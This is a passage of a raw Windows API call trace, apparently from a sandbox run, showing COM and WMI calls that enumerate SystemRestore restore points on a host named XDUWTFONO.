ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c3d8) returned 0x0 [0116.711] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c3d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.712] WbemDefPath:IUnknown:Release (This=0x77c3d8) returned 0x3 [0116.712] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.712] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.712] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x2 [0116.712] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x1 [0116.712] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.712] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.712] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738230, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x6738230) returned 0x0 [0116.712] WbemDefPath:IUnknown:AddRef (This=0x6738230) returned 0x3 [0116.712] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x2 [0116.712] WbemDefPath:IWbemPath:SetText (This=0x6738230, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=19") returned 0x0 [0116.712] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.712] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.712] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.712] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.712] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.712] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.712] IWbemClassObject:Get (in: This=0x673b600, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352eff0*=0, plFlavor=0x352eff4*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), pType=0x352eff0*=19, plFlavor=0x352eff4*=0) returned 0x0 [0116.712] IWbemClassObject:Get (in: This=0x673b600, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352eff0*=19, plFlavor=0x352eff4*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x13, varVal2=0x0), pType=0x352eff0*=19, plFlavor=0x352eff4*=0) returned 0x0 [0116.713] CoTaskMemAlloc (cb=0x4) returned 0x77c418 [0116.713] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c418, puReturned=0x3526b58 | out: apObjects=0x77c418*=0x673b798, puReturned=0x3526b58*=0x1) returned 0x0 [0116.716] IUnknown:QueryInterface (in: This=0x673b798, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673b798) returned 0x0 [0116.716] IUnknown:QueryInterface (in: This=0x673b798, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.716] IUnknown:QueryInterface (in: This=0x673b798, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.716] IUnknown:AddRef (This=0x673b798) returned 0x3 [0116.716] IUnknown:QueryInterface (in: This=0x673b798, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.716] IUnknown:QueryInterface (in: This=0x673b798, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.716] IUnknown:QueryInterface (in: This=0x673b798, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673b79c) returned 0x0 [0116.717] IMarshal:GetUnmarshalClass (in: This=0x673b79c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.717] IUnknown:Release (This=0x673b79c) returned 0x3 [0116.717] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.717] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.717] IUnknown:QueryInterface (in: This=0x673b798, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.717] IUnknown:Release (This=0x673b798) returned 0x2 [0116.717] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.717] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.717] IUnknown:QueryInterface (in: This=0x673b798, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673b798) returned 0x0 [0116.717] IUnknown:AddRef (This=0x673b798) returned 0x4 [0116.717] IUnknown:Release (This=0x673b798) returned 0x3 [0116.717] IUnknown:Release (This=0x673b798) returned 0x2 [0116.717] CoTaskMemFree (pv=0x77c418) [0116.717] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.717] IUnknown:AddRef (This=0x673b798) returned 0x3 [0116.717] IWbemClassObject:Get (in: This=0x673b798, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.717] IWbemClassObject:Get (in: This=0x673b798, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=16", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.717] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=16") returned 0x70 [0116.717] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=16") returned 0x70 [0116.717] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.718] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.718] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.718] IUnknown:Release (This=0x72015c) returned 0x1 [0116.718] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e78) returned 0x0 [0116.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e78, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.719] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e78, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x67382a0) returned 0x0 [0116.719] WbemDefPath:IUnknown:Release (This=0x6736e78) returned 0x0 [0116.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x67382a0) returned 0x0 [0116.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.719] WbemDefPath:IUnknown:AddRef (This=0x67382a0) returned 0x3 [0116.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dcfc | out: ppvObject=0x41dcfc*=0x0) returned 0x80004002 [0116.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dd08 | out: ppvObject=0x41dd08*=0x77c418) returned 0x0 [0116.719] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77c418, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dd10 | out: pCid=0x41dd10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0116.719] WbemDefPath:IUnknown:Release (This=0x77c418) returned 0x3 [0116.719] CoGetContextToken (in: pToken=0x41dd68 | out: pToken=0x41dd68) returned 0x0 [0116.719] CoGetContextToken (in: pToken=0x41e170 | out: pToken=0x41e170) returned 0x0 [0116.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e200 | out: ppvObject=0x41e200*=0x0) returned 0x80004002 [0116.719] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x2 [0116.719] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x1 [0116.719] CoGetContextToken (in: pToken=0x41eaf8 | out: pToken=0x41eaf8) returned 0x0 [0116.719] CoGetContextToken (in: pToken=0x41ea58 | out: pToken=0x41ea58) returned 0x0 [0116.719] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x41eb28*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41eb24 | out: ppvObject=0x41eb24*=0x67382a0) returned 0x0 [0116.719] WbemDefPath:IUnknown:AddRef (This=0x67382a0) returned 0x3 [0116.719] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x2 [0116.719] WbemDefPath:IWbemPath:SetText (This=0x67382a0, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=16") returned 0x0 [0116.720] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41eca8 | out: puCount=0x41eca8*=0x2) returned 0x0 [0116.720] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x0, pszText=0x0 | out: puBuffLength=0x41eca4*=0x11, pszText=0x0) returned 0x0 [0116.720] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41eca4*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41eca4*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.720] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec74 | out: puCount=0x41ec74*=0x2) returned 0x0 [0116.720] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x0, pszText=0x0 | out: puBuffLength=0x41ec70*=0x11, pszText=0x0) returned 0x0 [0116.720] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec70*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec70*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0116.720] IWbemClassObject:Get (in: This=0x673b798, wszName="sequencenumber", lFlags=0, pVal=0x41ec70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352f840*=0, plFlavor=0x352f844*=0 | out: pVal=0x41ec70*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), pType=0x352f840*=19, plFlavor=0x352f844*=0) returned 0x0 [0116.720] IWbemClassObject:Get (in: This=0x673b798, wszName="sequencenumber", lFlags=0, pVal=0x41ec78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x352f840*=19, plFlavor=0x352f844*=0 | out: pVal=0x41ec78*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x10, varVal2=0x0), pType=0x352f840*=19, plFlavor=0x352f844*=0) returned 0x0 [0116.720] CoTaskMemAlloc (cb=0x4) returned 0x77c458 [0116.720] IEnumWbemClassObject:Next (in: This=0x6736ac4, lTimeout=-1, uCount=0x1, apObjects=0x77c458, puReturned=0x3526b58 | out: apObjects=0x77c458*=0x673b930, puReturned=0x3526b58*=0x1) returned 0x0 [0116.721] IUnknown:QueryInterface (in: This=0x673b930, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x673b930) returned 0x0 [0116.721] IUnknown:QueryInterface (in: This=0x673b930, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e29c | out: ppvObject=0x41e29c*=0x0) returned 0x80004002 [0116.721] IUnknown:QueryInterface (in: This=0x673b930, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e0bc | out: ppvObject=0x41e0bc*=0x0) returned 0x80004002 [0116.721] IUnknown:AddRef (This=0x673b930) returned 0x3 [0116.721] IUnknown:QueryInterface (in: This=0x673b930, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dbfc | out: ppvObject=0x41dbfc*=0x0) returned 0x80004002 [0116.721] IUnknown:QueryInterface (in: This=0x673b930, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbac | out: ppvObject=0x41dbac*=0x0) returned 0x80004002 [0116.721] IUnknown:QueryInterface (in: This=0x673b930, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbb8 | out: ppvObject=0x41dbb8*=0x673b934) returned 0x0 [0116.721] IMarshal:GetUnmarshalClass (in: This=0x673b934, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dbc0 | out: pCid=0x41dbc0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0116.721] IUnknown:Release (This=0x673b934) returned 0x3 [0116.721] CoGetContextToken (in: pToken=0x41dc18 | out: pToken=0x41dc18) returned 0x0 [0116.721] CoGetContextToken (in: pToken=0x41e020 | out: pToken=0x41e020) returned 0x0 [0116.721] IUnknown:QueryInterface (in: This=0x673b930, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0b0 | out: ppvObject=0x41e0b0*=0x0) returned 0x80004002 [0116.722] IUnknown:Release (This=0x673b930) returned 0x2 [0116.722] CoGetContextToken (in: pToken=0x41e5f0 | out: pToken=0x41e5f0) returned 0x0 [0116.722] CoGetContextToken (in: pToken=0x41e550 | out: pToken=0x41e550) returned 0x0 [0116.722] IUnknown:QueryInterface (in: This=0x673b930, riid=0x41e620*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x41e61c | out: ppvObject=0x41e61c*=0x673b930) returned 0x0 [0116.722] IUnknown:AddRef (This=0x673b930) returned 0x4 [0116.722] IUnknown:Release (This=0x673b930) returned 0x3 [0116.722] IUnknown:Release (This=0x673b930) returned 0x2 [0116.722] CoTaskMemFree (pv=0x77c458) [0116.722] CoGetContextToken (in: pToken=0x41e958 | out: pToken=0x41e958) returned 0x0 [0116.722] IUnknown:AddRef (This=0x673b930) returned 0x3 [0116.722] IWbemClassObject:Get (in: This=0x673b930, wszName="__GENUS", lFlags=0, pVal=0x41ec6c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecec*=0, plFlavor=0x41ece8*=0 | out: pVal=0x41ec6c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x41ecec*=3, plFlavor=0x41ece8*=64) returned 0x0 [0116.722] IWbemClassObject:Get (in: This=0x673b930, wszName="__PATH", lFlags=0, pVal=0x41ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecd4*=0, plFlavor=0x41ecd0*=0 | out: pVal=0x41ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=20", varVal2=0x0), pType=0x41ecd4*=8, plFlavor=0x41ecd0*=64) returned 0x0 [0116.722] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=20") returned 0x70 [0116.722] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=20") returned 0x70 [0116.722] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ec7c | out: ppv=0x41ec7c*=0x72015c) returned 0x0 [0116.722] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ec74 | out: pAptType=0x41ec74*=1) returned 0x0 [0116.722] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ec78 | out: ppvObject=0x41ec78*=0x0) returned 0x80004002 [0116.722] IUnknown:Release (This=0x72015c) returned 0x1 [0116.723] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e5e8 | out: ppv=0x41e5e8*=0x6736e88) returned 0x0 [0116.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e88, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e800 | out: ppvObject=0x41e800*=0x0) returned 0x80004002 [0116.723] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e88, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e814 | out: ppvObject=0x41e814*=0x6738310) returned 0x0 [0116.723] WbemDefPath:IUnknown:Release (This=0x6736e88) returned 0x0 [0116.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e434 | out: ppvObject=0x41e434*=0x6738310) returned 0x0 [0116.723] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e3f0 | out: ppvObject=0x41e3f0*=0x0) returned 0x80004002 [0116.723] WbemDefPath:IUnknown:AddRef (This=0x6738310) returned 0x3 [0116.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dd4c | out: ppvObject=0x41dd4c*=0x0) returned 0x80004002 [0116.724] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738310, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, 